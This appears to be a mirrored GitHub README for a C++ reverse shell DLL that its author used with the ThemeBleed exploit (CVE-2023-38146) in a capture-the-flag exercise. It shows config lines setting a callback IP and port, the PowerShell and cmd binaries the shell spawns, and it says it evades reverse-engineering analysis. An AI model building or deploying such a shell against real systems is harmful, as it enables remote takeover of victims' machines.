Giters

Jnnshschl / ThemeBleedReverseShellDLL

Reverse shell i used in combination with the ThemeBleed exploit.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

ThemeBleed Reverse Shell DLL

Example reverse shell DLL I used in combination with the ThemeBleed exploit (https://github.com/Jnnshschl/CVE-2023-38146) in a CTF.

Some functions will be loaded at runtime using my RTFN stuff, this makes analysis of this shell a big pain for reverse engineers.

Make sure to build as "Release" and adjust these vars to your need:

constexpr auto rHost = "10.10.14.158";
constexpr auto rPort = "4711";
constexpr auto autoReconnect = false;

The shell is going to search for executables in the order which they appear in this array:

const char* rBinaries[]{
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "C:\\Windows\\System32\\cmd.exe",
    "powershell.exe",
    "cmd.exe"
};

About

Reverse shell i used in combination with the ThemeBleed exploit.

Languages

Language:C++ 100.0%